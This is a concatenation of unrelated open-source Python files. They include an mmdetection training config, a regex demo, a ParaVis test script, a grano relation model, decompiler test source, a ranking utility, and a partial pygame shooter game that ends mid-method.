                    crop_size=(384, 600),
                    allow_negative_crop=True),
                dict(
                    type='Resize',
                    img_scale=[(480, 1333), (512, 1333), (544, 1333),
                               (576, 1333), (608, 1333), (640, 1333),
                               (672, 1333), (704, 1333), (736, 1333),
                               (768, 1333), (800, 1333)],
                    multiscale_mode='value',
                    override=True,
                    keep_ratio=True)
            ]
        ]),
    dict(type='Normalize', **img_norm_cfg),
    dict(type='Pad', size_divisor=1),
    dict(type='DefaultFormatBundle'),
    dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
]
# test_pipeline, NOTE the Pad's size_divisor is different from the default
# setting (size_divisor=32). While there is little effect on the performance
# whether we use the default setting or use size_divisor=1.
test_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(
        type='MultiScaleFlipAug',
        img_scale=(1333, 800),
        flip=False,
        transforms=[
            dict(type='Resize', keep_ratio=True),
            dict(type='RandomFlip'),
            dict(type='Normalize', **img_norm_cfg),
            dict(type='Pad', size_divisor=1),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='Collect', keys=['img'])
        ])
]
data = dict(
    samples_per_gpu=2,
    workers_per_gpu=2,
    train=dict(filter_empty_gt=False, pipeline=train_pipeline),
    val=dict(pipeline=test_pipeline),
    test=dict(pipeline=test_pipeline))
# optimizer
# NOTE: backbone, sampling offsets and reference points use a 10x smaller lr,
# following the Deformable DETR paper.
optimizer = dict(
    type='AdamW',
    lr=2e-4,
    weight_decay=0.0001,
    paramwise_cfg=dict(
        custom_keys={
            'backbone': dict(lr_mult=0.1),
            'sampling_offsets': dict(lr_mult=0.1),
            'reference_points': dict(lr_mult=0.1)
        }))
optimizer_config = dict(grad_clip=dict(max_norm=0.1, norm_type=2))
# learning policy
lr_config = dict(policy='step', step=[40])
runner = dict(type='EpochBasedRunner', max_epochs=50)
|
open-mmlab/mmdetection
|
configs/deformable_detr/deformable_detr_r50_16x2_50e_coco.py
|
Python
|
apache-2.0
| 6,478
|
#coding:utf-8
import re

# Compile the regular expression into a Pattern object.
pattern = re.compile(r'\d+')

# Scan the text with search(); returns a Match or None when nothing matches.
# (print() works on both Python 2 and Python 3 for a single argument.)
result1 = pattern.search('abc192edf')

if result1:
    print(result1.group())
else:
    print('匹配失败1')
|
qiyeboy/SpiderBook
|
ch04/4.2.2.2.py
|
Python
|
mit
| 288
|
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# This case corresponds to: /visu/MeshPresentation/F1 case
# Create Mesh Presentation for all data of the given MED file
import sys
from paravistest import datadir, pictureext, get_picture_dir
from presentations import CreatePrsForFile, PrsTypeEnum
import pvserver as paravis
# Create presentations
myParavis = paravis.myParavis
# Directory for saving snapshots
picturedir = get_picture_dir("MeshPresentation/F1")
file = datadir + "ml.med"
print " --------------------------------- "
print "file ", file
print " --------------------------------- "
print "CreatePrsForFile..."
CreatePrsForFile(myParavis, file, [PrsTypeEnum.MESH], picturedir, pictureext)
|
FedoraScientific/salome-paravis
|
test/VisuPrs/MeshPresentation/F1.py
|
Python
|
lgpl-2.1
| 1,515
|
from grano.core import db, url_for
from grano.model.common import UUIDBase
from grano.model.property import Property, PropertyBase
class Relation(db.Model, UUIDBase, PropertyBase):
    """A directed, schema-typed link between two entities in a project."""

    __tablename__ = 'grano_relation'
    #PropertyClass = RelationProperty

    schema_id = db.Column(db.Integer, db.ForeignKey('grano_schema.id'),
                          index=True)
    source_id = db.Column(db.Unicode, db.ForeignKey('grano_entity.id'),
                          index=True)
    target_id = db.Column(db.Unicode, db.ForeignKey('grano_entity.id'),
                          index=True)
    project_id = db.Column(db.Integer, db.ForeignKey('grano_project.id'))
    author_id = db.Column(db.Integer, db.ForeignKey('grano_account.id'))

    properties = db.relationship(Property,
                                 order_by=Property.created_at.desc(),
                                 cascade='all, delete, delete-orphan',
                                 backref='relation', lazy='dynamic')

    def to_dict_base(self):
        """Serialize the relation without its properties."""
        return {
            'id': self.id,
            'properties': {},
            'project': self.project.to_dict_short(),
            'api_url': url_for('relations_api.view', id=self.id),
            'schema': self.schema.to_dict_index(),
            'source': self.source.to_dict_index(),
            'target': self.target.to_dict_index()
        }

    def to_dict(self):
        """Serialize the relation including its active properties."""
        data = self.to_dict_base()
        for prop in self.active_properties:
            name, prop = prop.to_dict_kv()
            data['properties'][name] = prop
        return data

    def to_dict_index(self):
        # The index representation is currently identical to the full one;
        # delegate so the two can never silently drift apart.
        return self.to_dict()
class BidiRelation(db.Model):
    """Denormalized, bidirectional view of relations.

    Each relation appears twice (once per direction); ``reverse`` marks the
    flipped copy.  Columns mirror Relation but carry no foreign keys.
    """
    __tablename__ = 'grano_relation_bidi'

    id = db.Column(db.Unicode, primary_key=True)
    created_at = db.Column(db.DateTime)
    updated_at = db.Column(db.DateTime)
    reverse = db.Column(db.Boolean)  # True for the direction-swapped copy
    relation_id = db.Column(db.Unicode)  # id of the underlying Relation
    source_id = db.Column(db.Unicode)
    target_id = db.Column(db.Unicode)
    project_id = db.Column(db.Integer)
    schema_id = db.Column(db.Integer)
    author_id = db.Column(db.Integer)
|
granoproject/grano
|
grano/model/relation.py
|
Python
|
mit
| 2,276
|
# NOTE: this file is decompiler test *source* for uncompyle6 — the exact
# shape of each try/except form exercises specific grammar rules, so the
# code below must not be refactored or "simplified".
# Tests:
#    trystmt     ::= SETUP_EXCEPT suite_stmts_opt POP_BLOCK
#                    try_middle COME_FROM
#    except_stmt ::= except
try:
    x = 1
except:
    pass

# Tests:
#    trystmt      ::= SETUP_EXCEPT suite_stmts_opt POP_BLOCK
#                     try_middle COME_FROM
#    except_stmt  ::= except_cond1 except_suite
#    except_suite ::= ...
try:
    x = 1
except ImportError:
    pass

# try / except / finally combination
try:
    x = 2
except ImportError:
    x = 3
finally:
    x = 4

# "except ... as name" binding form
try:
    x = 1
except ImportError as e:
    x = 2
|
moagstar/python-uncompyle6
|
test/simple_source/exception/01_try_except.py
|
Python
|
mit
| 495
|
import numpy as np
import tools, minimizers, montecarlo
class FeatureSet:
    """
    Basic class to input feature lists and perform basic operations on the lists.
    Can load data from a CSV file with a header row such as "candidate, list1, list2, ..."
    left-most column stores the names for candidates. Can perform Z-scaling and Min-Max
    scaling on data for multi-objective optimization.
    """
    def __init__(self):
        print("Initialized a set of feature lists")

    def load_data(self, filename):
        """Parse the CSV at *filename* into candidate names and attribute lists.

        Populates ``self.headers``, ``self.c_l`` (candidate names) and
        ``self.a_l`` (one list of floats per attribute), then computes ranks.
        """
        # Context manager guarantees the file is closed (the old code leaked
        # the handle).
        with open(filename, 'r') as f:
            self.headers = f.readline().rstrip('\n').split(',')
            self.c_l = []  # candidate names, m entries
            self.a_l = []  # attribute lists, (n headers - 1) lists of m floats
            for i in range(len(self.headers) - 1):
                self.a_l.append([])
            while True:
                l = f.readline().rstrip('\n').split(',')
                if len(l) <= 1:
                    break
                self.c_l.append(l[0])
                for i in range(0, len(l) - 1):
                    self.a_l[i].append(float(l[i + 1]))
        print("Found %d attributes, and %d candidates to rank." % ((len(self.headers) - 1), len(self.a_l[0])))
        self.call_ranks()

    def call_ranks(self):
        # Rank computation is delegated to the project's tools module.
        self.a_ranks = tools.get_ranks(self.a_l)

    def Z_scale(self):
        """Standardize each attribute list to zero mean and unit variance."""
        self.z_scaled = []
        for i in self.a_l:
            mean, std = np.mean(i), np.std(i)
            self.z_scaled.append([(x - mean) / std for x in i])
        self.z_scaled = np.array(self.z_scaled)

    def MinMax_scale(self):
        """Rescale each attribute list linearly into the [0, 1] range."""
        self.minmax_scaled = []
        for i in self.a_l:
            # lo/hi rather than min/max: avoid shadowing the builtins
            lo, hi = np.amin(i), np.amax(i)
            self.minmax_scaled.append([(x - lo) / (hi - lo) for x in i])
        self.minmax_scaled = np.array(self.minmax_scaled)
if __name__ == "__main__":
    # Smoke-test driver: load a toy dataset, scale it, then run every
    # available ranking strategy over the same FeatureSet in sequence.
    new_test = FeatureSet()
    new_test.load_data('data_files/toyset2')
    print new_test.headers
    print new_test.c_l
    new_test.Z_scale()
    new_test.MinMax_scale()
    # Multi-objective / rank-aggregation strategies from the project's
    # minimizers module; each .start() runs the full optimization.
    mo = minimizers.RandomWeights(new_test)
    mo.start()
    mc = minimizers.RankMC4(new_test)
    mc.start()
    brute = minimizers.RankBrute(new_test)
    brute.start()
    borda = minimizers.RankBorda(new_test)
    borda.start()
    random = minimizers.RankRandom(new_test)
    random.start()
    # Cross-entropy Monte-Carlo ranking with 40 samples per iteration
    # (second argument — presumably a population size; confirm in montecarlo).
    mcmc = montecarlo.CrossEntropy(new_test, 40)
    x = mcmc.start()
    #
#
|
aykol/PyRank
|
pyrank/rank.py
|
Python
|
mit
| 2,338
|
# -*- coding: utf-8 -*-
"""
003_static_blit_pretty.py
static blitting and drawing (pretty version)
url: http://thepythongamebook.com/en:part2:pygame:step003
author: horst.jens@spielend-programmieren.at
licence: gpl, see http://www.gnu.org/licenses/gpl.html
works with python3.4 and python2.7
Blitting a surface on a static position
Drawing a filled circle into ballsurface.
Blitting this surface once.
introducing pygame draw methods
The ball's rectangular surface is black because the background
color of the ball's surface was never defined nor filled."""
## to do fix buggy movement (up=down) ai movement for ketturkat ##
from __future__ import print_function, division
import pygame
import os
import random
import math
import sys
GRAD = math.pi / 180 # degrees-to-radians factor; math functions work in radians

def radians_to_degrees(radians):
    """Convert an angle from radians to degrees."""
    return math.degrees(radians)

def degrees_to_radians(degrees):
    """Convert an angle from degrees to radians."""
    return math.radians(degrees)
def showkeys():
    """Return the on-screen help lines describing the key bindings."""
    return [
        "Movement = cursor keys",
        "v = Spawn snowman turret",
        "space = shoot",
    ]
def write(msg="paolo is cool", color=(0,0,0)):
    """Render *msg* in the default size-32 font onto a fresh alpha surface."""
    font = pygame.font.SysFont("None", 32)
    rendered = font.render(msg, True, color)
    return rendered.convert_alpha()
def elastic_collision(sprite1, sprite2):
    """elasitc collision between 2 sprites (calculated as disc's).

    The function alters the dx and dy movement vectors of both sprites.
    The sprites need the property .mass, .radius, .x, .y, .dx, dy
    physic function from Leonard Michlmayr
    """
    # The push acts along the line connecting the two disc centres, so the
    # force direction is simply the centre-to-centre distance vector.
    dirx = sprite1.x - sprite2.x
    # BUGFIX: used sprite1.x here before, which skewed every collision that
    # was not purely horizontal.
    diry = sprite1.y - sprite2.y

    # Velocity of the centre of mass.
    sumofmasses = sprite1.mass + sprite2.mass
    sx = (sprite1.dx * sprite1.mass + sprite2.dx * sprite2.mass) / sumofmasses
    sy = (sprite1.dy * sprite1.mass + sprite2.dy * sprite2.mass) / sumofmasses

    # In the centre-of-mass frame the collision looks like each sprite
    # bouncing off a mirror perpendicular to (dirx, diry).
    bdxs = sprite2.dx - sx
    bdys = sprite2.dy - sy
    cbdxs = sprite1.dx - sx
    cbdys = sprite1.dy - sy

    # Project each relative velocity onto the mirror normal (dot product).
    distancesquare = dirx * dirx + diry * diry
    if distancesquare == 0:
        # Coincident centres should not happen; fall back to a random
        # direction so we never divide by zero.
        dirx = random.randint(0,11) - 5.5
        diry = random.randint(0,11) - 5.5
        distancesquare = dirx * dirx + diry * diry
    dp = (bdxs * dirx + bdys * diry) # scalar product
    dp /= distancesquare # divide by distance * distance.
    cdp = (cbdxs * dirx + cbdys * diry)
    cdp /= distancesquare

    # (dirx * dp, diry * dp) is the velocity component perpendicular to the
    # mirror; subtracting it twice reflects the velocity.  Only collide if
    # the sprites are actually moving towards each other: dp > 0.
    if dp > 0:
        sprite2.dx -= 2 * dirx * dp
        sprite2.dy -= 2 * diry * dp
        sprite1.dx -= 2 * dirx * cdp
        sprite1.dy -= 2 * diry * cdp
# ----------- classes ------------------------
class Text(pygame.sprite.Sprite):
    """A pygame Sprite that displays a line of text.

    Joins ``PygView.allgroup`` on creation; call :meth:`newmsg` to change
    the displayed string.
    """
    def __init__(self, msg="The Ketturkat Game Book", color=(0,0,0)):
        self.groups = PygView.allgroup
        self._layer = 1  # drawn below the game sprites (higher layers)
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.newmsg(msg,color)
    def update(self, time):
        pass # allgroup sprites need update method that accept time
    def newmsg(self, msg, color=(0,0,0)):
        # Re-render the text surface via the module-level write() helper.
        self.image = write(msg,color)
        self.rect = self.image.get_rect()
class Lifebar(pygame.sprite.Sprite):
    """A hitpoint bar hovering above its ``boss`` sprite.

    The boss must expose ``.rect``, ``.room``, ``.hitpoints``,
    ``.hitpointsfull`` and ``._layer``; the bar repaints itself whenever the
    hitpoint percentage changes and kills itself when the boss dies.
    """
    def __init__(self, boss):
        # NOTE(review): self.groups is never assigned here (the line below is
        # commented out), yet Sprite.__init__ reads it — presumably the
        # attribute is provided elsewhere (e.g. set on the class by PygView);
        # confirm before relying on this class in isolation.
        #self.groups = PygView.allgroup
        self.boss = boss
        self._layer = self.boss._layer
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.oldpercent = 0  # last drawn fill ratio, to skip redundant repaints
        self.height=7
        self.color=(94,76,29)
        self.bossdistance=10  # vertical gap between bar and boss sprite
        self.paint()
    def paint(self):
        # (Re)create the bar surface matching the boss's current width.
        self.image = pygame.Surface((self.boss.rect.width,self.height))
        self.image.set_colorkey((0,0,0)) # black transparent
        pygame.draw.rect(self.image, self.color, (0,0,self.boss.rect.width,self.height),1)
        self.rect = self.image.get_rect()
    def update(self, seconds):
        self.room = self.boss.room
        self.percent = self.boss.hitpoints / self.boss.hitpointsfull * 1.0
        if self.percent != self.oldpercent:
            self.paint() # important ! boss.rect.width may have changed (because rotating)
            pygame.draw.rect(self.image, (0,0,0), (1,1,self.boss.rect.width-2,self.height-2)) # fill black
            pygame.draw.rect(self.image, self.color, (1,1,
                int(self.boss.rect.width * self.percent),self.height-2),0) # fill green
            self.oldpercent = self.percent
        # Keep the bar centred a fixed distance above the boss.
        self.rect.centerx = self.boss.rect.centerx
        self.rect.centery = self.boss.rect.centery - self.boss.rect.height /2 - self.bossdistance
        if self.boss.hitpoints < 1: #check if boss is still alive
            self.kill() # kill the hitbar
    def draw_text(self, text):
        """Center text in window
        """
        # NOTE(review): this method reads self.font / self.screen, which are
        # never set on Lifebar — it looks misplaced (copied from a view
        # class?) and would raise AttributeError if called; verify.
        fw, fh = self.font.size(text)
        surface = self.font.render(text, True, (0, 0, 0))
        self.screen.blit(surface, (50,150))
class Fragment(pygame.sprite.Sprite):
    """generic Fragment class. Inherits to blue Fragment (implosion),
    red Fragment (explosion), smoke (black) and shots (purple)

    A short-lived particle that flies off in a random direction and kills
    itself after a random lifetime.
    """
    def __init__(self, x,y, room, layer = 9):
        self._layer = layer
        self.room = room
        # NOTE(review): self.groups is not assigned in this class; it is
        # presumably provided externally (subclass or PygView setup) — verify.
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.pos = [x,y]  # float position; rect is synced from it each frame
        self.fragmentmaxspeed = 1500# try out other factors !
        # Random velocity in the range [-maxspeed/2, +maxspeed/2) per axis.
        self.dx = (random.random() - 0.5) * self.fragmentmaxspeed
        self.dy = (random.random() - 0.5) * self.fragmentmaxspeed
        self.init2()
    def init2(self): # split the init method into 2 parts for better access from subclasses
        self.color=(128,0,0)
        self.lifetime = random.random() * 6  # seconds until self-destruction
        self.image = pygame.Surface((10,10))
        self.image.set_colorkey((0,0,0)) # black transparent
        pygame.draw.circle(self.image, self.color, (5,5), random.randint(2,5))
        self.image = self.image.convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.center = self.pos #if you forget this line the sprite sit in the topleft corner
        self.time = 0.0
    def update(self, seconds):
        self.time += seconds
        if self.time > self.lifetime:
            self.kill()
        # Integrate velocity, then sync the integer rect to the float position.
        self.pos[0] += self.dx * seconds
        self.pos[1] += self.dy * seconds
        self.rect.centerx = round(self.pos[0],0)
        self.rect.centery = round(self.pos[1],0)
class Doenertier (pygame.sprite.Sprite):
    """A yummy animal made out of pure döner and extra spicy, juicy chicken meat

    Wanders randomly; when the player comes within ``sniffrange`` it moves
    with the same sign as the distance on each axis.  Dies when it leaves
    the screen or runs out of hitpoints.
    """
    def __init__(self, room):
        self._layer = 8
        self.room = room
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.hitpoints = 50.0
        self.hitpointsfull = 50
        self.x = random.randint(0,PygView.width)
        self.y = random.randint(0,PygView.height)
        self.color = (52,100,81)
        # Two-circle body drawn on a transparent 30x60 surface.
        self.image = pygame.Surface((30,60))
        pygame.draw.circle(self.image, self.color, (15,20), 7)
        pygame.draw.circle(self.image, self.color, (15,60), 22)
        self.image.set_colorkey((0,0,0)) # black transparent
        self.image = self.image.convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.center = (self.x, self.y)
        self.sniffrange = 80  # detection radius in pixels
        self.dx = 0
        self.dy = 0
        self.speed = 20
        Lifebar(self)
    def update(self, seconds):
        #distance to player
        #if
        distx=self.x - PygView.ferris.x
        disty=self.y - PygView.ferris.y
        dist = (distx**2+disty**2)**0.5
        if dist < self.sniffrange:
            # NOTE(review): these signs move the sprite AWAY from the player
            # (opposite of EvilDoge) — possibly the inverted-movement bug
            # mentioned in the file-header TODO; confirm intent.
            if self.x > PygView.ferris.x:
                self.dx = self.speed
            elif self.x < PygView.ferris.x:
                self.dx = -self.speed
            if self.y > PygView.ferris.y:
                self.dy = self.speed
            elif self.y < PygView.ferris.y:
                self.dy = -self.speed
        else:
            #random movement
            self.dx = random.choice((-1,0,1))*self.speed
            self.dy = random.choice((-1,0,1))*self.speed
        if self.hitpoints < self.hitpointsfull:
            # NOTE(review): += 0.0 is a no-op — regeneration appears disabled
            # (EvilDoge uses 0.1 here); confirm whether that is intentional.
            self.hitpoints += 0.0
        self.x += self.dx * seconds
        self.y += self.dy * seconds
        self.rect.center = (self.x, self.y)
        if self.hitpoints <1:
            self.kill()
        # Leaving the screen is fatal.
        if self.x <0 or self.y<0 or self.x > PygView.width or self.y > PygView.height:
            self.hitpoints = 0
            self.kill()
class EvilSnowman (pygame.sprite.Sprite):
    """an evil snowman turret

    Stationary enemy that randomly (1% chance per frame) fires a homing
    Bullet at player number 1.
    """
    def __init__(self, room):
        self.room = room
        self._layer = 8
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.hitpoints = 120.0
        self.hitpointsfull = 120.0
        self.x = random.randint(0,PygView.width)
        self.y = random.randint(0,PygView.height)
        self.color = (200,20,200)
        # Two stacked circles on a transparent 30x60 surface.
        self.image = pygame.Surface((30,60))
        pygame.draw.circle(self.image, self.color, (15,20), 7)
        pygame.draw.circle(self.image, self.color, (15,40), 15)
        self.image.set_colorkey((0,0,0)) # black transparent
        self.image = self.image.convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.center = (self.x, self.y)
        Lifebar(self)
    def update(self, seconds):
        if random.random()< 0.01:
            Bullet(self,"1", room=self.room) #0 silas #1 ferris
        if self.hitpoints <1:
            self.kill()
class EvilDoge (pygame.sprite.Sprite):
    """An evil doge which follows you.

    Wanders randomly until the player (``PygView.ferris``) comes within
    ``sniffrange`` pixels, then closes in on both axes while firing homing
    bullets at player number 1.  Slowly regenerates hitpoints up to
    ``hitpointsfull``.
    """
    def __init__(self, room):
        self._layer = 8
        self.room = room
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.hitpoints = 10.0
        # random.randint needs integer bounds — float bounds raise a
        # ValueError on Python 3 (same 100..150 distribution as before).
        self.hitpointsfull = random.randint(100, 150)
        self.x = random.randint(0,PygView.width)
        self.y = random.randint(0,PygView.height)
        self.color = (40,151,64)
        # Three stacked circles on a transparent 30x60 surface.
        self.image = pygame.Surface((30,60))
        pygame.draw.circle(self.image, self.color, (15,20), 7)
        pygame.draw.circle(self.image, self.color, (15,40), 15)
        pygame.draw.circle(self.image, self.color, (15,60), 22)
        self.image.set_colorkey((0,0,0)) # black transparent
        self.image = self.image.convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.center = (self.x, self.y)
        self.sniffrange = 100  # detection radius in pixels
        self.dx = 0
        self.dy = 0
        self.speed = 40
        Lifebar(self)
    def update(self, seconds):
        # Distance to the player sprite.
        distx=self.x - PygView.ferris.x
        disty=self.y - PygView.ferris.y
        dist = (distx**2+disty**2)**0.5
        if dist < self.sniffrange:
            if random.random()< 0.08:
                Bullet(self,"1", room=self.room) #0 silas #1 ferris
            # Chase: reduce the gap to the player on each axis.
            if self.x > PygView.ferris.x:
                self.dx = -self.speed
            elif self.x < PygView.ferris.x:
                self.dx = self.speed
            if self.y > PygView.ferris.y:
                self.dy = -self.speed
            elif self.y < PygView.ferris.y:
                self.dy = self.speed
        else:
            # Random wandering when the player is out of range.
            self.dx = random.choice((-1,0,1))*self.speed
            self.dy = random.choice((-1,0,1))*self.speed
        if self.hitpoints < self.hitpointsfull:
            self.hitpoints += 0.1  # slow regeneration
        self.x += self.dx * seconds
        self.y += self.dy * seconds
        self.rect.center = (self.x, self.y)
        if self.hitpoints <1:
            self.kill()
class Bullet(pygame.sprite.Sprite):
    """A projectile.

    ``direction`` is either one of "up"/"down"/"left"/"right" for a straight
    shot, or a numeric string naming a player in ``PlayerSprite.objects`` to
    aim at (the velocity is fixed at spawn time — no continuous homing).
    """
    def __init__(self, boss ,direction, room):
        self._layer = 9
        self.room = room
        pygame.sprite.Sprite.__init__(self, self.groups)
        self.room = room
        self.direction = direction
        self.speed = 10 + random.random() *100  # 10..110 px/s, randomized
        self.boss = boss
        # Spawn at the shooter's position.
        self.x = self.boss.x
        self.y = self.boss.y
        self.lifetime = 0.0
        self.maxtime = 6.0  # hard upper bound on flight time in seconds
        self.target = False
        if self.direction == "up":
            self.dx=0
            self.dy=-self.speed
        elif self.direction == "down":
            self.dx=0
            self.dy=self.speed
        elif self.direction == "left":
            self.dx=-self.speed
            self.dy=0
        elif self.direction == "right":
            self.dx=self.speed
            self.dy=0
        else:
            # Anything else is a player number: aim at that player's
            # current position.
            self.targetnr = int(direction)
            #self.dx=random.random()*self.speed
            #self.dy=random.random()*self.speed
            self.target = PlayerSprite.objects[self.targetnr]
            self.ix = self.target.x - self.x
            self.iy = self.target.y - self.y
            self.angle = radians_to_degrees(math.atan2(self.iy, -self.ix))+90
            self.ddx = - math.sin(self.angle * GRAD)
            self.ddy = - math.cos(self.angle * GRAD)
            self.dx = self.ddx * self.speed
            self.dy = self.ddy * self.speed
        self.color=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
        # NOTE(review): this overrides maxtime-limited lifetime bookkeeping
        # above with a random value that is never compared against — only
        # update() increments/checks lifetime vs maxtime; confirm intent.
        self.lifetime = random.random() * 6
        self.image = pygame.Surface((10,10))
        self.image.set_colorkey((0,0,0)) # black transparent
        pygame.draw.circle(self.image, self.color, (5,5), 3)
        self.image = self.image.convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.center = (self.x, self.y)
    def update(self, seconds):
        self.lifetime += seconds  # age the bullet
        self.x += self.dx * seconds
        self.y += self.dy * seconds
        self.rect.center = (self.x, self.y)
        if self.lifetime > self.maxtime:
            self.kill()
class PlayerSprite(pygame.sprite.Sprite):
"""generic Bird class, to be called from SmallBird and BigBird"""
image=[] # list of all images
number = 0
objects={}
def __init__(self, area, layer = 4,hitpoints=100,imagenr=0,grid=50,ai=0, room=0):
#self.groups = PygView.allgroup, PygView.gravitygroup # assign groups
self._layer = layer # assign level
#self.layer = layer
self.room = room
pygame.sprite.Sprite.__init__(self, self.groups ) #call parent class. NEVER FORGET !
#self.area = PygView.screen.get_rect()
self.area = area
self.hitpoints = PygView.hitpoints
self.hitpointsfull = PygView.hitpointsfull
self.rotatespeed = 10.0
self.speed = 70.0
self.x= 0
self.y= 0
self.ai = ai
self.targetx = 0
self.targety = 0
self.oldx = 0
self.oldy = 0
self.automove = ""
self.direction = "right"
self.grid=grid
self.gridmaxx=self.area.width //grid
self.gridmaxy=self.area.height //grid
self.ddx = 0.0
self.ddy = 0.0
self.image = PlayerSprite.image[imagenr]
self.image0 = PlayerSprite.image[imagenr]
self.hitpoints = float(PygView.hitpoints) # actual hitpoints
self.hitpointsfull = float(PygView.hitpointsfull) # maximal hitpoints
self.rect = self.image.get_rect()
self.radius = max(self.rect.width, self.rect.height) / 2.0
self.dx = 0 # wait at the beginning
self.dy = 0
#self.waittime = Bird.waittime # 1.0 # one second
#self.lifetime = 0.0
self.rect.center = (-100,-100) # out of visible screen
self.frags = 125 # number of framgents if Bird is killed
self.number = PlayerSprite.number # get my personal Birdnumber
PlayerSprite.number+= 1 # increase the number for next Bird
PlayerSprite.objects[self.number] = self # store myself into the Bird dictionary
#print("my number %i Bird number %i and i am a %s " % (self.number, Bird.number, getclassname(self)))
#-------------------physic------------------
self.mass = 100.0
self.angle = 0.0
#self.boostspeed = 10 # speed to fly upward
#self.boostmax = 0.9 # max seconds of "fuel" for flying upward
#self.boostmin = 0.4 # min seconds of "fuel" for flying upward
#self.boosttime = 0.0 # time (fuel) remaining
#warpsound.play()
#for _ in range(8):
# BlueFragment(self.pos) # blue Frags
def left(self):
self.oldx=self.x
self.oldy=self.y
#self.x -= self.grid
self.targetx = self.x - self.grid
self.automove = "left"
def right(self):
self.oldx=self.x
self.oldy=self.y
#self.x += self.grid
self.targetx = self.x + self.grid
self.automove = "right"
def up(self):
self.oldy=self.y
self.oldx=self.x
#self.y -= self.grid
self.targety = self.y - self.grid
self.automove = "up"
def down(self):
self.oldy=self.y
self.oldx=self.x
#self.y += self.grid
self.targety = self.y + self.grid
self.automove = "down"
def kill(self):
PlayerSprite.objects.pop(self.number)
pygame.sprite.Sprite.kill(self) # kill the actual Bird
def speedcheck(self):
#if abs(self.dx) > BIRDSPEEDMAX:
# self.dx = BIRDSPEEDMAX * (self.dx/abs(self.dx)) # dx/abs(dx) is 1 or -1
#if abs(self.dy) > BIRDSPEEDMAX:
# self.dy = BIRDSPEEDMAX * (self.dy/abs(self.dy))
#if abs(self.dx) > 0 :
# self.dx *= FRICTION # make the Sprite slower over time
#if abs(self.dy) > 0 :
# self.dy *= FRICTION
pass
def gridcheck(self):
if self.x < self.grid //2:
self.x = self.grid //2
if self.x > self.grid * self.gridmaxx:
self.x = self.grid * self.gridmaxx
if self.y < self.grid //2:
self.y = self.grid //2
if self.y > self.grid * self.gridmaxy:
self.y = self.grid * self.gridmaxy
def areacheck(self):
if not self.area.contains(self.rect):
# --- compare self.rect and area.rect
if self.x + self.rect.width/2 > self.area.right:
self.x = self.area.right - self.rect.width/2
self.dx *= -0.5 # bouncing off but loosing speed
if self.x - self.rect.width/2 < self.area.left:
self.x = self.area.left + self.rect.width/2
self.dx *= -0.5 # bouncing off the side but loosing speed
if self.y + self.rect.height/2 > self.area.bottom:
self.y = self.area.bottom - self.rect.height/2
self.dy *= -0.5 # bouncing off the ground
if self.y - self.rect.height/2 < self.area.top:
self.y = self.area.top + self.rect.height/2
self.dy *= -0.5 # stop when reaching the sky
    def update(self, seconds):
        """Per-frame update: thrust keys, grid automove, rotation, clamping.

        seconds -- time since last frame; velocities are in pixels/second.
        Reads the live keyboard state (not events), so held keys keep acting.
        """
        keys=pygame.key.get_pressed()
        # acceleration for this frame, set by the WASD-style thrust keys below
        self.ddx = 0.0
        self.ddy = 0.0
        # NOTE(review): GRAD appears to convert self.angle (degrees) to
        # radians for math.sin/cos -- defined elsewhere in the file, confirm.
        if keys[pygame.K_w]: # forward
            self.ddx = -math.sin(self.angle*GRAD)
            self.ddy = -math.cos(self.angle*GRAD)
            # Smoke(self.rect.center, -self.ddx , -self.ddy )
        if keys[pygame.K_s]: # backward
            self.ddx = +math.sin(self.angle*GRAD)
            self.ddy = +math.cos(self.angle*GRAD)
            # Smoke(self.rect.center, -self.ddx, -self.ddy )
        if keys[pygame.K_e]: # right side
            self.ddx = +math.cos(self.angle*GRAD)
            self.ddy = -math.sin(self.angle*GRAD)
            # Smoke(self.rect.center, -self.ddx , -self.ddy )
        if keys[pygame.K_q]: # left side
            self.ddx = -math.cos(self.angle*GRAD)
            self.ddy = +math.sin(self.angle*GRAD)
            # Smoke(self.rect.center, -self.ddx , -self.ddy )
        # ------------- movement-------------------------------------
        # grid automove: slide toward targetx/targety set by left()/right()/
        # up()/down(); when the target is reached, snap to it and stop.
        if self.automove != "":
            if self.ai == 1:
                # AI-controlled sprite: pick a fresh random direction each frame
                self.automove = random.choice(("up","down","left","right"))
            if self.automove == "right":
                if self.x < self.targetx:
                    self.dx = self.speed
                else:
                    self.dx = 0
                    self.x = self.targetx
                    self.automove = ""
            elif self.automove == "left":
                if self.x > self.targetx:
                    self.dx = -self.speed
                else:
                    self.dx = 0
                    self.x = self.targetx
                    self.automove = ""
            # NOTE(review): "up" starts a new if-chain instead of continuing
            # the elif chain above; harmless since left/right only touch dx.
            if self.automove == "up":
                if self.y > self.targety:
                    self.dy = -self.speed
                else:
                    self.dy = 0
                    self.y = self.targety
                    self.automove = ""
            elif self.automove == "down":
                if self.y < self.targety:
                    self.dy = self.speed
                else:
                    self.dy = 0
                    self.y = self.targety
                    self.automove = ""
        # integrate acceleration -> velocity -> position
        self.dx += self.ddx * self.speed
        self.dy += self.ddy * self.speed
        self.x += self.dx * seconds
        self.y += self.dy * seconds
        #self.speedcheck()
        self.areacheck() # ------- check if Bird out of screen
        self.oldangle = self.angle
        if keys[pygame.K_a]: # left turn , counterclockwise
